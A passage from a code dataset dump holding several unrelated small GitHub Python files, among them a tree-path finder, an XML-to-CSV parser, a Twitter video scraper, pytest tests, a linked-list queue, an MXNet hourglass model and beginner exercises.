None\n\n\"\"\"\n方法:打印所有满足根节点等于num的所有路径\n参数,root,输入的目标值num, 路径和sum, 路径v是列表\n\"\"\"\ndef FindRoad(root,num,sums,v):\n # v是一个list用于存储路径\n sums+=root.data\n v.append(root.data)\n if root.lchild == None and root.rchild ==None and sums == num :\n print(v,end=\"\\n\")\n # 遍历左子树\n if root.lchild != None:\n FindRoad(root.lchild,num,sums,v)\n if root.rchild != None:\n FindRoad(root.rchild,num,sums,v)\n # 清除遍历路径\n sums = sums - v[-1]\n v.remove(v[-1])\n\ndef constructTree():\n root = BITNode()\n node1 = BITNode()\n node2 = BITNode()\n node3 = BITNode()\n node4 = BITNode()\n root.data = 6\n node1.data = 3\n node2.data = -7\n node3.data = -1\n node4.data = 9\n root.lchild = node1\n root.rchild = node2\n node1.lchild = node3\n node1.rchild = node4\n node2.lchild=node2.rchild=node3.lchild=node3.rchild=node4.lchild=node4.rchild=None\n return root\n\nif __name__ == \"__main__\":\n root = constructTree()\n s = []\n FindRoad(root,8,0,s)","repo_name":"karlhl/Programmer_Algorithm_Interview","sub_path":"第三章 二叉树/3.10 二叉树中找出与输入整数相等的所有路径.py","file_name":"3.10 二叉树中找出与输入整数相等的所有路径.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74324091124","text":"import xml.etree.ElementTree as et \nimport pandas as pd\nimport sys\nfrom tqdm import tqdm\n\n\ndef parse_tree(root):\n df_cols = [\"ds_name\", \"id\", \"frame_num\", \"orientation\", \"box_h\", \"box_w\", \"box_xc\", \"box_yc\", \"appearance\", \"movement\", \"role\", \"context\", \"situation\"]\n df = pd.DataFrame(columns=df_cols)\n d = {}\n ds_name = root.attrib.get('name')\n d[\"ds_name\"] = ds_name\n for frame in tqdm(root):\n frame_num = frame.attrib.get('number')\n d[\"frame_num\"] = frame_num\n\n objectlist = frame[0]\n # grouplist = frame[1]\n \n for obj in objectlist:\n objectid = obj.attrib.get('id')\n d['id'] = objectid\n\n orientation = obj[0].text\n d['orientation'] = orientation\n\n box = obj[1].attrib\n\n box_h = box.get('h')\n d['box_h'] = box_h\n\n box_w = box.get('w')\n d['box_w'] = box_w\n\n box_xc = box.get('xc')\n d['box_xc'] = box_xc\n\n box_yc = box.get('yc')\n d['box_yc'] = box_yc\n\n appearance = obj[2].text\n d['appearance'] = appearance\n\n hypothesis = obj[3][0]\n movement = hypothesis[0].text\n d['movement'] = movement\n\n role = hypothesis[1].text\n d['role'] = role\n\n context = hypothesis[2].text\n d['context'] = context\n\n situation = hypothesis[3].text\n d['situation'] = situation\n\n df = df.append(d, ignore_index=True)\n return df\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n raise EnvironmentError('Not enough arguments specified')\n INFILE = sys.argv[1]\n OUTFILE = sys.argv[2]\n xtree = et.parse(\"test.xml\")\n xroot = xtree.getroot()\n\n df = parse_tree(xroot)\n df.to_csv(OUTFILE)","repo_name":"ishvlad/TrackTion","sub_path":"xml_to_csv.py","file_name":"xml_to_csv.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11360722069","text":"import tweepy\nimport requests\nimport os\nimport sys\nfrom dotenv import load_dotenv\nimport zipfile\nimport io\nimport pathlib\n\n#all api keys stored in .env file\n#get API keys within heroku environment\nconsumer_key=str(os.environ.get('CONSUMER_KEY'))\nconsumer_secret=str(os.environ.get('CONSUMER_SECRET'))\naccess_token_key=str(os.environ.get('ACCESS_TOKEN_KEY'))\naccess_token_secret=str(os.environ.get('ACCESS_TOKEN_SECRET'))\n\n#if using script outside of heroku environment\nif consumer_key == 'None':\n load_dotenv()\n consumer_key=str(os.environ.get('CONSUMER_KEY'))\n consumer_secret=str(os.environ.get('CONSUMER_SECRET'))\n access_token_key=str(os.environ.get('ACCESS_TOKEN_KEY'))\n access_token_secret=str(os.environ.get('ACCESS_TOKEN_SECRET'))\n\n\n#init API\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token_key, access_token_secret)\n\napi = tweepy.API(auth)\n\n#search tweets\ndef search(tag, count = 10, likes = 0, lang = None):\n # like_str = \"\"\n # if likes > 0:\n # like_str = \"%20min_faves%3A\" + str(likes)\n\n if not lang:\n return api.search(q=tag + \" filter:native_video -filter:retweets\", rpp=count, count=count, min_faves=likes, include_entities=True)\n else:\n return api.search(q=tag + \" filter:native_video -filter:retweets\", rpp=count, count=count, min_faves=likes, lang=lang, include_entities=True)\n\n#get video url\ndef get_media(tweet):\n try:\n variants = tweet.extended_entities['media'][0]['video_info']['variants']\n return get_best_video(variants)\n except:\n return False\n\n#select highest quality url\ndef get_best_video(variants):\n highest = variants[0]\n for v in variants:\n if v['content_type'] == 'video/mp4':\n if highest['bitrate'] < v['bitrate']:\n highest = v\n\n return highest['url']\n\n#save media to device\ndef save_media(url, path):\n file = requests.get(url)\n path = path + \".mp4\"\n\n i = 1\n while os.path.isfile(path):\n path = path[:-4] + \"(\" + str(i) + \").mp4\"\n i += 1\n\n open(path, 'wb').write(file.content)\n\n#main method\ndef scrape(tag, path, count=10, likes=0, lang=None, zip=False):\n #create dir if not exists\n if not os.path.exists(path):\n os.mkdir(path)\n\n for i in search(tag, count = count, likes=likes, lang=lang):\n\n url = get_media(i)\n if url:\n save_media(url, path + i.user.screen_name)\n\n if zip:\n return get_zip_data(path)\n\n return True\n\ndef get_zip_data(path):\n base_path = pathlib.Path(\"./\"+path)\n data = io.BytesIO()\n with zipfile.ZipFile(data, mode='w') as z:\n for f_name in base_path.iterdir():\n z.write(f_name)\n os.unlink(f_name)\n os.rmdir(path)\n data.seek(0)\n return data\n\n\n#usage:\n#on terminal write python media_scraper.py [tag] [folder path] [tweet count]\nif __name__ == '__main__':\n print(sys.argv)\n if len(sys.argv) > 1:\n tag = sys.argv[1]\n path = sys.argv[2]\n count = int(sys.argv[3])\n likes=None\n if len(sys.argv) > 4:\n likes = count = int(sys.argv[4])\n scrape(tag, path, count=count, likes=likes)\n else:\n scrape(\"meme\", \"results/\")\n","repo_name":"jaortiz117/tweet-media-scraper","sub_path":"media_scraper.py","file_name":"media_scraper.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26493182567","text":"from copy import deepcopy\nfrom pathlib import Path\n\nimport pytest\n\nfrom gentle.generators.cpan import CpanGenerator\nfrom gentle.metadata import MetadataXML\nfrom tests.utils import compare_mxml\n\n\ndef test_pkg_none(mxml: MetadataXML):\n gen = CpanGenerator(Path(__file__).parent / \"pkg_none\")\n assert not gen.active\n\n\ndef test_pkg_empty(mxml: MetadataXML):\n gen = CpanGenerator(Path(__file__).parent / \"pkg_empty\")\n assert gen.active\n\n mxml_old = deepcopy(mxml)\n gen.update_metadata_xml(mxml)\n assert compare_mxml(mxml_old, mxml) == \"\"\n\n\n@pytest.mark.parametrize(\"dirname\", [\"URI\"])\ndef test_pkg(mxml: MetadataXML, dirname: str):\n gen = CpanGenerator(Path(__file__).parent / dirname)\n assert gen.active\n\n gen.update_metadata_xml(mxml)\n with open(Path(__file__).parent / dirname / \"metadata.xml\") as file:\n assert mxml.dumps() == file.read().rstrip()\n\n mxml_prev = deepcopy(mxml)\n gen.update_metadata_xml(mxml)\n assert compare_mxml(mxml_prev, mxml) == \"\"\n\n\n@pytest.mark.perl\ndef test_pkg_script_empty(mxml: MetadataXML):\n gen = CpanGenerator(Path(__file__).parent / \"pkg_script\" / \"empty\")\n assert gen.active\n\n mxml_old = deepcopy(mxml)\n gen.update_metadata_xml(mxml)\n assert compare_mxml(mxml_old, mxml) == \"\"\n\n\n@pytest.mark.perl\n@pytest.mark.parametrize(\"dirname\", [\"URI\"])\ndef test_pkg_script(mxml: MetadataXML, dirname: str):\n directory = Path(__file__).parent / \"pkg_script\" / dirname\n\n gen = CpanGenerator(directory)\n assert gen.active\n\n gen.update_metadata_xml(mxml)\n with open(directory / \"metadata.xml\") as file:\n assert mxml.dumps() == file.read().rstrip()\n\n mxml_prev = deepcopy(mxml)\n gen.update_metadata_xml(mxml)\n assert compare_mxml(mxml_prev, mxml) == \"\"\n","repo_name":"CyberTailor/gentle","sub_path":"tests/cpan/test_generator.py","file_name":"test_generator.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29231104855","text":"A, B = map(int, input().split())\nC = int(input())\nwhile C >= 0:\n if B + C > 59:\n A += 1\n C =C - (60 - B)\n B = 0\n else:\n B += C\n C = 0\n if A > 23:\n A = 0\n if C == 0:\n break\nprint(str(A) + \" \"+ str(B))","repo_name":"jshk1205/pythonPractice","sub_path":"2525.py","file_name":"2525.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35542140753","text":"from pickletools import OpcodeInfo\nfrom sqlite3 import IntegrityError\n\n\npizza = \"\"\"\nEliga el tamaño de pizza que desea\n(1)-Tamaño 1\n(2)-Tamaño 2\n(3)-Tamaño 3\n\"\"\"\nopcion = input(pizza)\ningre = int(input(\"Cuantos ingredientes desea llevar, Escribir 0 si ninguno\")) \ningre = 4000 * ingre\nif opcion == \"1\":\n total = 15000 + ingre\n print(\"el total es de : \", total)\nelif opcion == \"2\":\n total2 = 24000 + ingre\n print(\"El total es de\", total2 )\nelif opcion == \"3\":\n total3 = 36000 + ingre\n print(\"El total es de \", total3 )\n","repo_name":"SantiCrG/Python-Condicionales","sub_path":"09-Pizzas.py","file_name":"09-Pizzas.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22756030061","text":"import os\nfrom enum import Enum\nimport pickle\nimport difflib\nimport json\nimport roman\nimport html\n\nimport requests\n\nfrom utils.progressBar import ProgressBar\nfrom data.collectionsList import LORE_BOOK_COLLECTIONS, CHAPTERS\n\nclass Category:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n self.summary = data.get('summary', None)\n self.plainTextSummary = data.get('plain_text_summary', None)\n self.featured = data.get('featured', None)\n self.chronological = data.get('chronological', None)\n self.count = data.get('count', None)\n\nclass GrimoireCard:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n self.bungieRef = data.get('bungieRef')\n self.imageUrl = data.get('image_url')\n self.fullImageUrl = data.get('full_image_url')\n self.intro = data.get('intro')\n self.introAttribution = data.get('intro_attribution')\n self.description = html.unescape(data.get('description')).replace('
    ', '\\n') if data.get('description') else None\n self.bungieDeleted = data.get('bungie_deleted')\n if data.get('categories'):\n self.categories = [Category(i) for i in data.get('categories')]\n else:\n self.categories = []\n\nclass Item:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n self.bungieRef = data.get('bungie_ref')\n self.imageUrl = data.get('image_url')\n self.fullImageUrl = data.get('full_image_url')\n self.displaySource = data.get('display_source')\n self.description = html.unescape(data.get('description')).replace('
    ', '\\n') if data.get('description') else None\n self.bungieDeleted = data.get('bungie_deleted')\n if data.get('categories'):\n self.categories = [Category(i) for i in data.get('categories')]\n else:\n self.categories = []\n\nclass LoreEntry:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n self.bungieRef = data.get('bungie_ref')\n self.imageUrl = data.get('image_url')\n self.fullImageUrl = data.get('full_image_url')\n if self.fullImageUrl == '':\n self.fullImageUrl = \"./static/missing_entry.png\"\n self.subtitle = data.get('subtitle')\n self.description = html.unescape(data.get('description')).replace('
    ', '\\n') if data.get('description') else None\n self.bungieDeleted = data.get('bungie_deleted')\n if data.get('categories'):\n self.categories = [Category(i) for i in data.get('categories')]\n else:\n self.categories = []\n if data.get('items'):\n self.items = [Item(i) for i in data.get('items')]\n else:\n self.items = []\n\nclass Transcript:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n\nclass Record:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n self.bungieRef = data.get('bungie_ref')\n self.imageUrl = data.get('image_url')\n self.fullImageUrl = data.get('full_image_url')\n self.description = html.unescape(data.get('description')).replace('
    ', '\\n') if data.get('description') else None\n if data.get('categories'):\n self.categories = [Category(i) for i in data.get('categories')]\n else:\n self.categories = []\n\nclass IshtarManager:\n ISHTAR_ROOT = 'https://api.ishtar-collective.net/'\n BUNGIE_ROOT = 'https://www.bungie.net/'\n BUNGIE_API_EXT = '/Platform'\n\n class Collection(Enum):\n categories = \"categories\"\n grimoire_cards = \"cards\"\n items = \"items\"\n entries = \"entries\"\n transcripts = \"transcripts\"\n records = \"records\"\n\n def __init__(self, dataFileLoc):\n self.dataFileLoc = os.path.abspath(dataFileLoc)\n self.path = os.path.dirname(self.dataFileLoc)\n self._session = requests.Session()\n\n self.LORE_BOOK_COLLECTIONS = LORE_BOOK_COLLECTIONS\n self.CHAPTERS = CHAPTERS\n\n if not os.path.isfile(self.dataFileLoc):\n self.updateCollective()\n self.loadCollective()\n\n def loadCollective(self):\n with open(self.dataFileLoc, 'rb') as file:\n raw_data = pickle.load(file)\n for key in raw_data.keys():\n if len(raw_data[key]) == 0:\n continue\n if self.Collection(key) == self.Collection.categories:\n self.categories = [Category(j) for j in raw_data[key]]\n elif self.Collection(key) == self.Collection.grimoire_cards:\n self.grimoireCards = [GrimoireCard(j) for j in raw_data[key]]\n elif self.Collection(key) == self.Collection.items:\n self.items = [Item(j) for j in raw_data[key]]\n elif self.Collection(key) == self.Collection.entries:\n self.loreEntries = [LoreEntry(j) for j in raw_data[key]]\n elif self.Collection(key) == self.Collection.transcripts:\n self.transcripts = [Transcript(j) for j in raw_data[key]]\n elif self.Collection(key) == self.Collection.records:\n self.records = [Record(j) for j in raw_data[key]]\n print('Loaded Collective')\n\n def updateCollective(self):\n res = self._session.get(self.ISHTAR_ROOT)\n if res.status_code == 200:\n routing = res.json()\n raw_data = {}\n for collection in routing['navigation'].keys():\n data = self._session.get(routing['navigation'][collection])\n if data.status_code == 200:\n raw_data[collection] = []\n response = data.json()\n try:\n collection_prop = self.Collection(collection)\n pb = ProgressBar(' ', '█', response['meta']['total_count'])\n pb.progress(0, status = 'Loading Ishtar ' + collection.capitalize())\n while 'meta' in response.keys() and 'next_page' in response['meta'].keys() and response['meta']['next_page']:\n for i in response[collection_prop.name]:\n pb.progress(1, status = 'Loading Ishtar ' + collection.capitalize())\n raw_data[collection].append(i)\n data = self._session.get(response['meta']['next_page_url'])\n if data.status_code == 200:\n response = data.json()\n else:\n raise Exception(f\"Failed to retrieve Ishtar Collective {collection} collection: {data.status_code}\")\n pb.ETA()\n collection_prop = self.Collection(collection)\n for i in response[collection_prop.name]:\n pb.progress(1, status = 'Loading Ishtar ' + collection.capitalize())\n raw_data[collection].append(i)\n except:\n pass\n\n else:\n raise Exception(f\"Failed to retrieve Ishtar Collective {collection} collection: {data.status_code}\")\n with open(self.dataFileLoc, 'wb+') as file:\n pickle.dump(raw_data, file)\n else:\n raise Exception(f\"Failed to retrieve Ishtar Collective routing: {res.status_code}\")\n\n def buildCollections(self):\n collected = {}\n for card in self.grimoireCards:\n for category in card.categories:\n for collection in self.LORE_BOOK_COLLECTIONS[\"D1\"].keys():\n if not collection in collected.keys():\n collected[collection] = {\"cards\": []}\n for book in self.LORE_BOOK_COLLECTIONS[\"D1\"][collection]:\n if book.lower() in category.name.lower():\n collected[collection]['cards'].append(card)\n\n for entry in self.loreEntries:\n for category in entry.categories:\n for collection in self.LORE_BOOK_COLLECTIONS[\"D2\"].keys():\n if not collection in collected.keys():\n collected[collection] = {\"books\": {}}\n for book in self.LORE_BOOK_COLLECTIONS[\"D2\"][collection]:\n if book.lower() in category.name.lower():\n if not book in collected[collection][\"books\"].keys():\n collected[collection][\"books\"][book] = []\n collected[collection][\"books\"][book].append(entry)\n\n for entry in collected.keys():\n if 'cards' in collected[entry].keys():\n collected[entry]['cards'] = sorted(collected[entry]['cards'], key = self.sortD1Collection)\n elif 'books' in collected[entry].keys():\n collected[entry]['books'] = self.sortD2Books(collected[entry]['books'])\n\n return collected\n\n def sortD1Collection(self, x):\n x = x.name\n try:\n s = ':'.join(x.split(':')[1:])\n r = roman.fromRoman(x.split(':')[0])\n except:\n s = x\n if 'Curiosity' in s:\n r = 0\n elif 'Insight' in s:\n r = 200\n else:\n r = 0\n finally:\n return r, s\n\n def sortD2Books(self, books):\n res = {}\n for book in books.keys():\n res[book] = sorted(books[book], key = lambda x: self.CHAPTERS[book].index(x.name))\n return res\n\n def loadItemByName(self, name):\n name = difflib.get_close_matches(name, [item.name for item in self.items], n=1)\n if len(name) > 0:\n name = name[0]\n for item in self.items:\n if item.name == name:\n return item\n return None\n\n def loadItemsByName(self, name):\n names = difflib.get_close_matches(name, [item.name for item in self.items], n=16)\n for item in self.items:\n if item.name in names:\n names[names.index(item.name)] = item\n return names\n\n def loadGrimoireByName(self, name):\n names = difflib.get_close_matches(name, [card.name for card in self.grimoireCards], n=16)\n for card in self.grimoireCards:\n if card.name in names:\n names[names.index(card.name)] = card\n return names\n\n def loadLoreEntriesByName(self, name):\n names = difflib.get_close_matches(name, [entry.name for entry in self.loreEntries], n=16)\n for entry in self.loreEntries:\n if entry.name in names:\n names[names.index(entry.name)] = entry\n return names\n\nif __name__ == \"__main__\":\n manager = IshtarManager('./data/EncryptedIshtarData.pickle')\n manager.buildCollections()\n","repo_name":"Aryathel/DestinyLoreOrganization","sub_path":"utils/ishtarManager.py","file_name":"ishtarManager.py","file_ext":"py","file_size_in_byte":11960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71502802807","text":"'''\n Queue : A Queue is a linear structure which follows a particular order in which the operations are performed. The order is First In First Out (FIFO).\n A good example of a queue is any queue of consumers for a resource where the consumer that came first is served first.The difference between\n stacks and queues is in removing. In a stack we remove the item the most recently added; in a queue, we remove the item the least recently added.\n\n Queue can be created by using both Singly and Doubly Linked list , in this implementation\n we will be using doubly linked list \n\n Basically as stack queue also has two operations enqueue and dequeue.\n as Queue uses FIFO (First in First Out) the elements are removed based on their insertion order\n i.e if 1,2,3,4,5,6 are inserted in the Queue then 1 will be the element to be removed first and will continue accordingly\n\n Here in this we will maintain two pointers that are mainly head and tail\n\n the Enqueueing process will be done from tail and Dequeueing will be done from head\n\n Enqueueing : The process of adding elements \n Dequeueing : The Process of removing elements\n\n Enqueuing :\n\n Initially both head and tail will point to a common Node :\n\n --------------\n head -> | data1 | next | <- tail\n --------------\n\n But as the Elements are added tail is shifted towards right (Enqueueing)\n\n # Step 1 :\n\n -------------- --------------\n head -> | data1 | next | -> | data2 | next | <- tail\n -------------- --------------\n\n # Step 2 :\n\n -------------- -------------- --------------\n head -> | data1 | next | -> | data2 | next | -> | data3 | next | <- tail\n -------------- -------------- --------------\n\n\n\n Dequeueing :\n\n This will start from left to right head will shift from Node to Node and will start removing \n Nodes according to their Insertion Order .\n\n # Step 1 :\n\n -------------- -------------- --------------\n head -> | data1 | next | -> | data2 | next | -> | data3 | next | <- tail\n -------------- -------------- --------------\n\n # Step 2 : \n\n As we can see data1 is removed from the Queue\n\n -------------- -------------- \n head -> -> | data2 | next | -> | data3 | next | <- tail\n -------------- -------------- \n\n # Step 3 :\n\n -------------- \n head -> | data3 | next | <- tail\n -------------- \n\n\n'''\n\n# Initializing our Node that we will use\nclass Node:\n\n def __init__(self):\n self.prev = None\n self.data = None\n self.next = None\n# Initializing our Queue Class\nclass Queue:\n\n def __init__(self):\n self.head = None\n self.tail = None\n\n\n # Function to Enqueue (Insertion) Elements in Queue\n def enqueue(self):\n new_node = Node()\n a = int(input(\"\\nEnter the data for node :\"))\n new_node.data = a\n if(self.head==None):\n self.head = new_node\n print(\"Initially Head and Tail are pointing to : %d \" % self.head.data )\n return\n\n last = self.head\n while(last.next!=None):\n last = last.next\n\n last.next = new_node\n new_node.prev = last\n self.tail = new_node\n print(\"Tail is pointing to : %d \" % self.tail.data )\n\n # Function to Print Queue\n def printqueue(self):\n\n if self.head==None :\n print(\"\\nQueue is Empty\")\n temp = self.head\n while(temp):\n print(temp.data)\n temp = temp.next\n\n # Function to Print the Queue in Reverse Order\n def reverse(self):\n temp = self.tail\n while(temp):\n print(temp.data)\n temp = temp.prev\n \n # Function that returns Head and Tail value\n def headtail(self):\n print(\"Head : %d \" % self.head.data)\n print(\"Tail : %d \\n\" % self.tail.data)\n\n # Function to Dequeue (Removing) Elements from the Queue\n def dequeue(self):\n\n if(self.head==None):\n print(\"\\nQueue is empty !!\")\n return\n\n print(\"\\nHead is pointing to %s \" % self.head.data)\n print(\"\\n%d is dequeued from the Queue. \" % self.head.data)\n temp = self.head\n self.head = temp.next\n temp=None\n # return\n\n# Main function \nif __name__ == \"__main__\":\n q1 = Queue() \n for i in range(0,6):\n q1.enqueue()\n print(\"\\nElement in queue are as follow:\\n\")\n q1.printqueue()\n print(\"\\nThe values of head and tail are :\\n\")\n q1.headtail()\n q1.reverse()\n for i in range(0,6):\n q1.dequeue()\n q1.printqueue()","repo_name":"Bhush98/queue_in_python","sub_path":"queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32318162300","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport mxnet as mx\nimport numpy as np\nfrom config import config\nfrom block import conv_block, ConvFactory\nfrom heatmap import l2_loss, ce_loss, SymCoherent\n\n\n\ndef Conv(**kwargs):\n body = mx.sym.Convolution(**kwargs)\n return body\n\ndef Act(data, act_type, name):\n if act_type=='prelu':\n body = mx.sym.LeakyReLU(data = data, act_type='prelu', name = name)\n else:\n body = mx.symbol.Activation(data=data, act_type=act_type, name=name)\n return body\n \n\ndef hourglass(data, nFilters, nModules, n, workspace, name, binarize, dcn):\n s = 2\n _dcn = False\n up1 = data\n for i in xrange(nModules):\n up1 = conv_block(up1, nFilters, (1,1), True, \"%s_up1_%d\"%(name,i), binarize, _dcn, 1)\n low1 = mx.sym.Pooling(data=data, kernel=(s, s), stride=(s,s), pad=(0,0), pool_type='max')\n for i in xrange(nModules):\n low1 = conv_block(low1, nFilters, (1,1), True, \"%s_low1_%d\"%(name,i), binarize, _dcn, 1)\n if n>1:\n low2 = hourglass(low1, nFilters, nModules, n-1, workspace, \"%s_%d\"%(name, n-1), binarize, dcn)\n else:\n low2 = low1\n for i in xrange(nModules):\n low2 = conv_block(low2, nFilters, (1,1), True, \"%s_low2_%d\"%(name,i), binarize, _dcn, 1) #TODO\n low3 = low2\n for i in xrange(nModules):\n low3 = conv_block(low3, nFilters, (1,1), True, \"%s_low3_%d\"%(name,i), binarize, _dcn, 1)\n up2 = mx.symbol.UpSampling(low3, scale=s, sample_type='nearest', workspace=512, name='%s_upsampling_%s'%(name,n), num_args=1)\n return mx.symbol.add_n(up1, up2)\n\n\ndef get_symbol(num_classes):\n m = config.multiplier\n sFilters = max(int(64*m), 32)\n mFilters = max(int(128*m), 32)\n nFilters = int(256*m)\n\n nModules = 1\n bn_mom = config.bn_mom\n workspace = config.workspace\n nStacks = config.net_stacks\n binarize = config.net_binarize\n input_size = config.input_img_size\n label_size = config.output_label_size\n use_coherent = config.net_coherent\n use_SAT = config.net_sat\n N = config.net_n\n DCN = config.net_dcn\n per_batch_size = config.per_batch_size\n print('binarize', binarize)\n print('use_coherent', use_coherent)\n print('use_SAT', use_SAT)\n print('use_N', N)\n print('use_DCN', DCN)\n print('per_batch_size', per_batch_size)\n #assert(label_size==64 or label_size==32)\n #assert(input_size==128 or input_size==256)\n coherentor = SymCoherent(per_batch_size)\n D = input_size // label_size\n print(input_size, label_size, D)\n data = mx.sym.Variable(name='data')\n data = data-127.5\n data = data*0.0078125\n gt_label = mx.symbol.Variable(name='softmax_label')\n losses = []\n closses = []\n ref_label = gt_label\n if D==4:\n body = Conv(data=data, num_filter=sFilters, kernel=(7, 7), stride=(2,2), pad=(3, 3),\n no_bias=True, name=\"conv0\", workspace=workspace)\n else:\n body = Conv(data=data, num_filter=sFilters, kernel=(3, 3), stride=(1,1), pad=(1, 1),\n no_bias=True, name=\"conv0\", workspace=workspace)\n body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name='bn0')\n body = Act(data=body, act_type='relu', name='relu0')\n\n dcn = False\n body = conv_block(body, mFilters, (1,1), sFilters==mFilters, 'res0', False, dcn, 1)\n\n body = mx.sym.Pooling(data=body, kernel=(2, 2), stride=(2,2), pad=(0,0), pool_type='max')\n\n body = conv_block(body, mFilters, (1,1), True, 'res1', False, dcn, 1) #TODO\n body = conv_block(body, nFilters, (1,1), mFilters==nFilters, 'res2', binarize, dcn, 1) #binarize=True?\n\n heatmap = None\n\n for i in xrange(nStacks):\n shortcut = body\n if config.net_sat>0:\n sat = SAT(body, nFilters, nModules, config.net_n+1, workspace, 'sat%d'%(i))\n body = sat.get()\n else:\n body = hourglass(body, nFilters, nModules, config.net_n, workspace, 'stack%d_hg'%(i), binarize, dcn)\n for j in xrange(nModules):\n body = conv_block(body, nFilters, (1,1), True, 'stack%d_unit%d'%(i,j), binarize, dcn, 1)\n _dcn = True if config.net_dcn>=2 else False\n ll = ConvFactory(body, nFilters, (1,1), dcn = _dcn, name='stack%d_ll'%(i))\n _name = \"heatmap%d\"%(i) if i=2 else False\n if not _dcn:\n out = Conv(data=ll, num_filter=num_classes, kernel=(1, 1), stride=(1,1), pad=(0,0),\n name=_name, workspace=workspace)\n else:\n out_offset = mx.symbol.Convolution(name=_name+'_offset', data = ll,\n num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))\n out = mx.contrib.symbol.DeformableConvolution(name=_name, data=ll, offset=out_offset,\n num_filter=num_classes, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False)\n #out = Conv(data=ll, num_filter=num_classes, kernel=(3,3), stride=(1,1), pad=(1,1),\n # name=_name, workspace=workspace)\n\n _dcn = True if (config.net_dcn==1 or config.net_dcn==3) else False\n if i0:\n ux, dx = coherentor.get(out)\n closs = l2_loss(ux, dx)\n closs = closs/nStacks\n closses.append(closs)\n\n pred = mx.symbol.BlockGrad(heatmap)\n #loss = mx.symbol.add_n(*losses)\n #loss = mx.symbol.MakeLoss(loss)\n #syms = [loss]\n syms = []\n for loss in losses:\n loss = mx.symbol.MakeLoss(loss)\n syms.append(loss)\n if len(closses)>0:\n coherent_weight = 0.0001\n closs = mx.symbol.add_n(*closses)\n closs = mx.symbol.MakeLoss(closs, grad_scale = coherent_weight)\n syms.append(closs)\n syms.append(pred)\n sym = mx.symbol.Group( syms )\n return sym","repo_name":"deepinx/deep-face-alignment","sub_path":"symbols/hourglass.py","file_name":"hourglass.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"76"} +{"seq_id":"3375680195","text":"import asyncio\n\nimport aiohttp\n\n\nclass AsyncSession:\n def __init__(self, url):\n self._url = url\n\n async def __aenter__(self):\n self.session = aiohttp.ClientSession()\n response = await self.session.get(self._url)\n return response\n\n async def __aexit__(self, exc_type, exc_value, traceback):\n await self.session.close()\n\n\nasync def check(url):\n async with AsyncSession(url) as response:\n html = await response.text()\n print(f\"{url}: {html[:15]}\")\n\n\nasync def main():\n res1 = asyncio.create_task(check(\"https://facebook.com\"))\n res2 = asyncio.create_task(check(\"https://youtube.com\"))\n res3 = asyncio.create_task(check(\"https://google.com\"))\n\n print(await res1)\n print(await res2)\n print(await res3)\n\n\nasyncio.run(main())\n","repo_name":"Beforethedoor/asyncio","sub_path":"7_async_with.py","file_name":"7_async_with.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18921747025","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pylab\n\n#A experiment is carried out ntrials times in which n coins are tossed and the total number of heads each time is recorded\n\nntrials = 100\nn = 100 # number of coins tossed\na = np.random.randint(2, size=(ntrials, n))\nHeads=np.array([np.sum(side==0) for side in a])\n\n_, bins, _ = pylab.hist(Heads, bins=ntrials-1, normed=True, histtype='bar')\n#Binomial distribution\nb =[np.math.factorial(ntrials)/(np.math.factorial(int(item))*np.math.factorial(ntrials - int(item))) for item in bins]\nc = b*0.5**(bins) * (1-0.5)**(ntrials-bins)\nprint(c)\npylab.plot(bins, c)\n\n#Distribuição normal\npylab.plot(bins,1/(Heads.std() * np.sqrt(2*np.pi))*np.exp(-(bins - Heads.mean())**2 / (2*Heads.std()**2)), lw=2) \npylab.xlabel('Number of 